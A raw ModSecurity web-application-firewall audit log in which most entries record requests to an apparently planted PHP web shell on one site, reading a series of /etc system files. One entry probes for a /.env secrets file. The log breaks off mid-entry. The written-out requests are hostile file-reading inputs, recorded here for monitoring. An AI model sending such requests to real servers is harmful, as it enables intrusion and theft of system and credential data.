--9f9daa5c-A-- [15/Jun/2025:13:56:47.728778 +0530] aE6Dx7p3Rl2d9qI7hkJnjQAAAAM 216.73.216.83 53870 127.0.0.1 7081 --9f9daa5c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Flogrotate.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9f9daa5c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3253 Connection: close Content-Type: text/html; charset=UTF-8 --9f9daa5c-H-- Message: Warning. Matched phrase "etc/logrotate.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/logrotate.conf found within ARGS:viewfile: /etc/logrotate.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/logrotate.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/logrotate.conf found within ARGS:viewfile: /etc/logrotate.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6Dx7p3Rl2d9qI7hkJnjQAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976007724716 4116 (- - -) Stopwatch2: 1749976007724716 4116; combined=2094, p1=353, p2=1620, p3=34, p4=34, p5=53, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9f9daa5c-Z-- --6c6f002a-A-- [15/Jun/2025:13:57:39.113147 +0530] aE6D-9-DHezsSmx4Vom9vgAAAAI 216.73.216.83 48246 127.0.0.1 7081 --6c6f002a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Ffuse.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6c6f002a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3276 Connection: close Content-Type: text/html; charset=UTF-8 --6c6f002a-H-- Message: Warning. Matched phrase "etc/fuse.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/fuse.conf found within ARGS:viewfile: /etc/fuse.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/fuse.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/fuse.conf found within ARGS:viewfile: /etc/fuse.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6D-9-DHezsSmx4Vom9vgAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976059108859 4342 (- - -) Stopwatch2: 1749976059108859 4342; combined=2151, p1=344, p2=1679, p3=35, p4=35, p5=57, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6c6f002a-Z-- --a7579a7d-A-- [15/Jun/2025:13:57:39.476766 +0530] aE6D-7p3Rl2d9qI7hkJnnAAAAAM 216.73.216.83 45702 127.0.0.1 7081 --a7579a7d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fdeluser.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a7579a7d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3282 Connection: close Content-Type: text/html; charset=UTF-8 --a7579a7d-H-- Message: Warning. Matched phrase "etc/deluser.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/deluser.conf found within ARGS:viewfile: /etc/deluser.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/deluser.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/deluser.conf found within ARGS:viewfile: /etc/deluser.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6D-7p3Rl2d9qI7hkJnnAAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976059472207 4613 (- - -) Stopwatch2: 1749976059472207 4613; combined=2281, p1=420, p2=1726, p3=38, p4=36, p5=61, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a7579a7d-Z-- --f6815f3e-A-- [15/Jun/2025:13:57:44.258562 +0530] aE6D_vVbLd3MzwkmrE-KzwAAAAg 143.198.155.199 45856 127.0.0.1 7081 --f6815f3e-B-- GET /.env HTTP/1.0 Host: purchasync.cstechns.com X-Real-IP: 143.198.155.199 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept-Charset: utf-8 Accept-Encoding: gzip --f6815f3e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://purchasync.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --f6815f3e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "purchasync.cstechns.com"] [uri "/.env"] [unique_id "aE6D_vVbLd3MzwkmrE-KzwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/purchasync.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749976062569810 1688815 (- - -) Stopwatch2: 1749976062569810 1688815; combined=1620, p1=364, p2=1149, p3=0, p4=0, p5=106, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6815f3e-Z-- --53852f4b-A-- [15/Jun/2025:13:58:29.812288 +0530] aE6ELd-DHezsSmx4Vom91gAAAAI 216.73.216.83 33276 127.0.0.1 7081 --53852f4b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fprofile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --53852f4b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3215 Connection: close Content-Type: text/html; charset=UTF-8 --53852f4b-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6ELd-DHezsSmx4Vom91gAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976109808065 4278 (- - -) Stopwatch2: 1749976109808065 4278; combined=2271, p1=381, p2=1762, p3=37, p4=35, p5=56, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --53852f4b-Z-- --63174115-A-- [15/Jun/2025:13:59:15.336070 +0530] aE6EW7p3Rl2d9qI7hkJnzQAAAAM 216.73.216.83 43372 127.0.0.1 7081 --63174115-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fsysctl.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --63174115-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3849 Connection: close Content-Type: text/html; charset=UTF-8 --63174115-H-- Message: Warning. Matched phrase "etc/sysctl.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sysctl.conf found within ARGS:viewfile: /etc/sysctl.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sysctl.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sysctl.conf found within ARGS:viewfile: /etc/sysctl.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6EW7p3Rl2d9qI7hkJnzQAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976155332506 3618 (- - -) Stopwatch2: 1749976155332506 3618; combined=1720, p1=279, p2=1323, p3=33, p4=33, p5=52, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --63174115-Z-- --049b0d09-A-- [15/Jun/2025:13:59:15.414387 +0530] aE6EW086SWGxMlRL5UU4RwAAAAU 216.73.216.83 43382 127.0.0.1 7081 --049b0d09-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fpam.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --049b0d09-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3112 Connection: close Content-Type: text/html; charset=UTF-8 --049b0d09-H-- Message: Warning. Matched phrase "etc/pam.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/pam.conf found within ARGS:viewfile: /etc/pam.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/pam.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/pam.conf found within ARGS:viewfile: /etc/pam.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6EW086SWGxMlRL5UU4RwAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976155332762 81689 (- - -) Stopwatch2: 1749976155332762 81689; combined=157263, p1=350, p2=1535, p3=36, p4=33, p5=77681, sr=88, sw=0, l=0, gc=77628 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --049b0d09-Z-- --4542607e-A-- [15/Jun/2025:13:59:56.318088 +0530] aE6EhLQynla1sJRjEuHBxAAAAAQ 216.73.216.83 35100 127.0.0.1 7081 --4542607e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fhdparm.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --4542607e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4943 Connection: close Content-Type: text/html; charset=UTF-8 --4542607e-H-- Message: Warning. Matched phrase "etc/hdparm.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hdparm.conf found within ARGS:viewfile: /etc/hdparm.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/hdparm.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hdparm.conf found within ARGS:viewfile: /etc/hdparm.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6EhLQynla1sJRjEuHBxAAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976196313930 4212 (- - -) Stopwatch2: 1749976196313930 4212; combined=2082, p1=320, p2=1635, p3=34, p4=37, p5=56, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4542607e-Z-- --dcd09e6c-A-- [15/Jun/2025:14:01:19.202411 +0530] aE6E18ZRGs9Zs5Qd_koLzQAAAAA 216.73.216.83 60826 127.0.0.1 7081 --dcd09e6c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fhost.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --dcd09e6c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3000 Connection: close Content-Type: text/html; charset=UTF-8 --dcd09e6c-H-- Message: Warning. Matched phrase "etc/host.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/host.conf found within ARGS:viewfile: /etc/host.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/host.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/host.conf found within ARGS:viewfile: /etc/host.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6E18ZRGs9Zs5Qd_koLzQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976279198283 4185 (- - -) Stopwatch2: 1749976279198283 4185; combined=2083, p1=369, p2=1567, p3=54, p4=34, p5=59, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dcd09e6c-Z-- --66ace342-A-- [15/Jun/2025:14:01:19.294771 +0530] aE6E17Qynla1sJRjEuHB4gAAAAQ 216.73.216.83 60922 127.0.0.1 7081 --66ace342-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fld.so.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --66ace342-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2950 Connection: close Content-Type: text/html; charset=UTF-8 --66ace342-H-- Message: Warning. Matched phrase "etc/ld.so.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:viewfile: /etc/ld.so.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:viewfile: /etc/ld.so.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6E17Qynla1sJRjEuHB4gAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976279290752 4072 (- - -) Stopwatch2: 1749976279290752 4072; combined=2013, p1=336, p2=1553, p3=34, p4=35, p5=54, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --66ace342-Z-- --785ddc2d-A-- [15/Jun/2025:14:01:19.841431 +0530] aE6E19-DHezsSmx4Vom-GwAAAAI 216.73.216.83 41224 127.0.0.1 7081 --785ddc2d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fkernel-img.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --785ddc2d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3008 Connection: close Content-Type: text/html; charset=UTF-8 --785ddc2d-H-- Message: Warning. Matched phrase "etc/kernel-img.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/kernel-img.conf found within ARGS:viewfile: /etc/kernel-img.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/kernel-img.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/kernel-img.conf found within ARGS:viewfile: /etc/kernel-img.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6E19-DHezsSmx4Vom-GwAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976279837163 4321 (- - -) Stopwatch2: 1749976279837163 4321; combined=2190, p1=393, p2=1654, p3=51, p4=35, p5=57, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --785ddc2d-Z-- --72119811-A-- [15/Jun/2025:14:01:19.932311 +0530] aE6E1_VbLd3MzwkmrE-LNQAAAAg 216.73.216.83 41236 127.0.0.1 7081 --72119811-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fdebconf.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --72119811-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4221 Connection: close Content-Type: text/html; charset=UTF-8 --72119811-H-- Message: Warning. Matched phrase "etc/debconf.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/debconf.conf found within ARGS:viewfile: /etc/debconf.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/debconf.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/debconf.conf found within ARGS:viewfile: /etc/debconf.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6E1_VbLd3MzwkmrE-LNQAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976279928048 4318 (- - -) Stopwatch2: 1749976279928048 4318; combined=2200, p1=351, p2=1715, p3=35, p4=35, p5=64, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --72119811-Z-- --a4a9ff05-A-- [15/Jun/2025:14:01:20.114206 +0530] aE6E2LIQi_ruyWEJ7bFJWQAAAAk 216.73.216.83 41250 127.0.0.1 7081 --a4a9ff05-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fnetworks HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a4a9ff05-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2984 Connection: close Content-Type: text/html; charset=UTF-8 --a4a9ff05-H-- Message: Warning. Matched phrase "etc/networks" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/networks found within ARGS:viewfile: /etc/networks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/networks" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/networks found within ARGS:viewfile: /etc/networks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6E2LIQi_ruyWEJ7bFJWQAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976280110454 3824 (- - -) Stopwatch2: 1749976280110454 3824; combined=1953, p1=324, p2=1514, p3=32, p4=30, p5=53, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a4a9ff05-Z-- --8e735616-A-- [15/Jun/2025:14:01:27.014309 +0530] aE6E3X15LOn2YRwTZIj42gAAAAc 80.94.68.170 41900 127.0.0.1 7081 --8e735616-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 80.94.68.170 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 361 origin: https://www.retaxis.com user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.6.1 content-type: text/plain;charset=UTF-8 accept: */* referer: https://www.retaxis.com/ accept-encoding: gzip, deflate accept-language: en-US,en;q=0.8 cookie: _fbp=fb.1.1749976285714.43898612388752582 --8e735616-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: 